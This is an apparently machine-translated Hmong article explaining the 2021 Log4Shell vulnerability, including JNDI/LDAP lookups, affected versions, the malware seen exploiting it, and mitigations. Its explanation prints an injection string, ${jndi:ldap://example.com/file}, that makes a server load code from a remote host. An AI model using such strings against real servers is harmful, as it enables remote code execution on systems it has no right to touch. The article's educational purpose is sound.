Table of Contents[Hide][Show]
Thaum lub Kaum Ib Hlis 2021, peb tau nthuav tawm qhov kev hem thawj loj rau cybersecurity. Qhov kev siv no yuav muaj feem cuam tshuam rau ntau lab lub khoos phis tawj thoob ntiaj teb.
Qhov no yog ib qho kev qhia ntawm Log4j qhov tsis zoo thiab yuav ua li cas ib qho kev tsis pom kev tsim qhov tsis zoo uas tshuav ntau dua 90% ntawm lub ntiaj teb cov kev pabcuam hauv computer qhib los tua.
Apache Log4j yog qhov qhib qhov chaw Java-raws li kev siv hluav taws xob tsim los ntawm Apache Software Foundation. Keeb kwm sau los ntawm Ceki Gülcü hauv 2001, tam sim no nws yog ib feem ntawm Apache Logging Services, ib qhov project ntawm Apache Software Foundation.
Cov tuam txhab thoob ntiaj teb siv lub tsev qiv ntawv Log4j txhawm rau txhawm rau nkag rau lawv cov ntawv thov. Qhov tseeb, lub tsev qiv ntawv Java yog qhov dav heev, koj tuaj yeem pom nws hauv cov ntawv thov los ntawm Amazon, Microsoft, Google, thiab ntau dua.
Qhov tseem ceeb ntawm lub tsev qiv ntawv txhais tau hais tias ib qho kev tsis txaus ntseeg hauv cov cai tuaj yeem tso ntau lab lub khoos phis tawj qhib rau kev nyiag. Lub Kaum Ib Hlis 24, 2021, a huab ruaj ntseg tus kws tshawb fawb ua haujlwm rau Alibaba nrhiav pom qhov tsis txaus ntshai.
Log4j vulnerability, tseem hu ua Log4Shell, muaj nyob unnoticed txij li thaum 2013. Lub vulnerability tso cai rau cov neeg ua phem ua txhaum cai khiav code ntawm cuam tshuam systems khiav Log4j. Nws tau tshaj tawm rau lub Kaum Ob Hlis 9, 2021
Cov kws tshaj lij kev lag luam hu rau Log4Shell qhov tsis zoo qhov yooj yim tshaj plaws hauv kev nco tsis ntev los no.
Hauv lub lim tiam tom qab tshaj tawm txog qhov tsis zoo, pawg cybersecurity tau kuaj pom ntau lab kev tawm tsam. Qee cov kws tshawb fawb txawm pom tus nqi ntau dua ib puas tawm tsam ib feeb.
Ua li cas nws ua hauj lwm?
Yuav kom nkag siab tias yog vim li cas Log4Shell thiaj li txaus ntshai, peb yuav tsum nkag siab tias nws muaj peev xwm ua tau li cas.
Log4Shell vulnerability tso cai rau arbitrary code execution, uas yeej txhais tau hais tias ib tug attacker yuav khiav tej lus txib los yog code ntawm lub hom phiaj tshuab.
Nws ua kom tiav qhov no li cas?
Ua ntej, peb yuav tsum nkag siab tias JNDI yog dab tsi.
Java Naming and Directory Interface (JNDI) yog Java kev pabcuam uas tso cai rau Java cov haujlwm tshawb nrhiav thiab nrhiav cov ntaub ntawv thiab cov peev txheej ntawm lub npe. Cov kev pabcuam hauv phau ntawv no yog qhov tseem ceeb vim tias lawv muab cov ntaub ntawv khaws tseg rau cov neeg tsim khoom kom yooj yim siv thaum tsim cov ntawv thov.
JNDI tuaj yeem siv ntau yam kev cai kom nkag mus rau qee cov npe. Ib qho ntawm cov txheej txheem no yog Cov Txheej Txheem Kev Nkag Mus Nkag Siab, lossis LDAP.
Thaum sau ib txoj hlua, log4j ua txoj hlua hloov thaum lawv ntsib cov kab lus ntawm daim ntawv ${prefix:name}
.
Piv txwv li, Text: ${java:version}
tej zaum yuav raug sau ua ntawv: Java version 1.8.0_65. Cov kev hloov pauv no yog qhov muaj.
Peb kuj tuaj yeem muaj cov kab lus xws li Text: ${jndi:ldap://example.com/file}
uas siv JNDI system thauj khoom Java los ntawm URL los ntawm LDAP raws tu qauv.
Qhov no zoo thauj cov ntaub ntawv los ntawm qhov URL mus rau hauv lub tshuab. Txhua tus neeg muaj peev xwm hacker tuaj yeem tuav cov lej tsis zoo ntawm qhov URL pej xeem thiab tos cov tshuab siv Log4j los sau nws.
Txij li cov ntsiab lus ntawm cov lus kaw muaj cov ntaub ntawv tswj hwm tus neeg siv, cov neeg nyiag nkas tuaj yeem tso lawv tus kheej JNDI cov ntaub ntawv uas taw qhia rau LDAP servers uas lawv tswj. Cov LDAP servers no tuaj yeem ua rau tag nrho cov khoom phem Java uas JNDI tuaj yeem ua tiav los ntawm qhov tsis zoo.
Dab tsi ua rau qhov no tsis zoo yog tias nws tsis muaj teeb meem yog tias daim ntawv thov yog server-sab lossis daim ntawv thov sab nraud.
Tsuav yog muaj ib txoj hauv kev rau tus logger nyeem tus neeg tawm tsam lub siab phem code, daim ntawv thov tseem qhib rau exploits.
Leej twg cuam tshuam?
Qhov tsis muaj zog cuam tshuam rau txhua lub tshuab thiab cov kev pabcuam uas siv APache Log4j, nrog rau versions 2.0 txog thiab suav nrog 2.14.1.
Ntau tus kws paub txog kev ruaj ntseg qhia tias qhov tsis zoo yuav cuam tshuam rau ntau daim ntawv thov siv Java.
Qhov tsis txaus ntseeg tau pom thawj zaug hauv Microsoft-muaj Minecraft video game. Microsoft tau hais kom lawv cov neeg siv hloov kho lawv Java tsab Minecraft software los tiv thaiv kev pheej hmoo.
Jen Easterly, Tus Thawj Coj ntawm Cybersecurity thiab Infrastructure Security Agency (CISA) hais tias cov neeg muag khoom muaj qhov lub luag haujlwm loj txhawm rau tiv thaiv cov neeg siv kawg los ntawm cov neeg ua phem phem uas siv qhov tsis zoo no.
"Cov neeg muag khoom yuav tsum tau sib txuas lus nrog lawv cov neeg siv khoom kom ntseeg tau tias cov neeg siv khoom kawg paub tias lawv cov khoom muaj qhov tsis zoo no thiab yuav tsum ua qhov tseem ceeb rau kev hloov kho software."
Cov kev tawm tsam tau tshaj tawm twb pib lawm. Symantec, lub tuam txhab uas muab cybersecurity software, tau soj ntsuam ntau qhov kev thov tawm tsam.
Nov yog qee qhov piv txwv ntawm hom kev tawm tsam uas cov kws tshawb fawb tau tshawb pom:
- botnets
Botnets yog lub network ntawm cov khoos phis tawj uas nyob rau hauv kev tswj hwm ntawm ib tog neeg tawm tsam. Lawv pab ua DDoS tawm tsam, nyiag cov ntaub ntawv, thiab lwm yam kev dag ntxias. Cov kws tshawb nrhiav pom Muhstik botnet hauv plhaub ntawv rub tawm los ntawm Log4j siv.
- XMRig Miner Trojan
XMRig yog qhov qhib-qhov chaw cryptocurrency miner uas siv CPUs rau kuv lub Monero token. Cybercriminals tuaj yeem nruab XMRig ntawm tib neeg cov khoom siv kom lawv tuaj yeem siv lawv lub zog ua yam tsis muaj lawv qhov kev paub.
- Khoos phis tawj Ransomware
Ransomware hais txog ib hom malware tsim los encrypt cov ntaub ntawv ntawm lub computer. Cov neeg tawm tsam tuaj yeem thov kev them nyiaj hauv kev sib pauv rau kev nkag rov qab rau cov ntaub ntawv encrypted. Cov kws tshawb fawb nrhiav pom Khonsari ransomware hauv Log4Shell tawm tsam. Lawv tsom Windows servers thiab siv .NET moj khaum.
Ua li cas tom ntej no?
Cov kws tshaj lij kwv yees nws yuav siv sij hawm ntau lub hlis lossis tej zaum txawm tias ntau xyoo los kho qhov kev ntxhov siab los ntawm Log4J qhov tsis zoo.
Cov txheej txheem no suav nrog kev hloov kho txhua qhov cuam tshuam nrog lub patched version. Txawm hais tias tag nrho cov tshuab no tau patched, tseem muaj qhov kev hem thawj ntawm qhov muaj peev xwm rov qab uas cov neeg nyiag nkas tau ntxiv rau lub qhov rais uas cov servers tau qhib rau kev tawm tsam.
Muaj ntau kev daws teeb meem thiab kev txo qis muaj nyob los tiv thaiv cov ntawv thov los ntawm kev siv los ntawm cov kab no. Tus tshiab Log4j version 2.15.0-rc1 hloov ntau yam kev teeb tsa kom txo tau qhov tsis zoo no.
Tag nrho cov nta uas siv JNDI yuav raug cuam tshuam los ntawm lub neej ntawd thiab cov chaw taws teeb saib tau raug txwv ib yam. Disabling lub lookup feature ntawm koj Log4j teeb yuav pab txo tau txoj kev pheej hmoo ntawm exploits.
Sab nraum Log4j, tseem xav tau txoj kev npaj dav dua los tiv thaiv kev qhib qhov chaw siv.
Thaum ntxov lub Tsib Hlis, Lub Tsev Dawb tau tshaj tawm ib qho daim ntawv txiav txim uas tsom los txhim kho lub teb chaws cybersecurity. Nws suav nrog kev npaj rau daim nqi software ntawm cov ntaub ntawv (SBOM) uas yog ib qho tseem ceeb ntawm cov ntaub ntawv uas muaj cov npe ntawm txhua yam khoom xav tau los tsim daim ntawv thov.
Qhov no suav nrog cov khoom xws li cov Qhib qhov chaw pob khoom, kev vam khom, thiab APIs siv rau kev txhim kho. Txawm hais tias lub tswv yim ntawm SBOMs yuav pab tau kom pom tseeb, nws puas yuav pab tau cov neeg siv khoom tiag?
Kev hloov kho dua tshiab tuaj yeem ua rau muaj kev cuam tshuam ntau dhau. Cov tuam txhab tsuas tuaj yeem xaiv them cov nqi nplua es tsis muaj kev pheej hmoo nkim sijhawm ntxiv mus nrhiav lwm pob khoom. Tej zaum cov SBOMs no tsuas yog siv tau yog tias lawv muaj yog txwv ntxiv.
xaus
Qhov teeb meem Log4j yog ntau tshaj li qhov teeb meem kev lag luam rau cov koom haum.
Cov thawj coj lag luam yuav tsum paub txog cov kev pheej hmoo uas tuaj yeem tshwm sim thaum lawv cov servers, cov khoom lag luam, lossis cov kev pabcuam vam khom rau cov cai uas lawv tus kheej tsis tuav.
Kev cia siab rau qhov chaw qhib thiab cov ntawv thov thib peb ib txwm los nrog qee qhov kev pheej hmoo. Cov tuam txhab lag luam yuav tsum xav txog kev ua haujlwm tawm tswv yim txo kev pheej hmoo ua ntej kev hem thawj tshiab tuaj txog.
Ntau lub vev xaib tso siab rau cov software qhib uas tswj hwm los ntawm ntau txhiab tus neeg tuaj yeem pab dawb thoob ntiaj teb.
Yog tias peb xav kom lub vev xaib muaj kev nyab xeeb, tsoomfwv thiab cov tuam txhab yuav tsum nqis peev nyiaj rau kev siv nyiaj qhib thiab cov koom haum cybersecurity xws li CISA.
Sau ntawv cia Ncua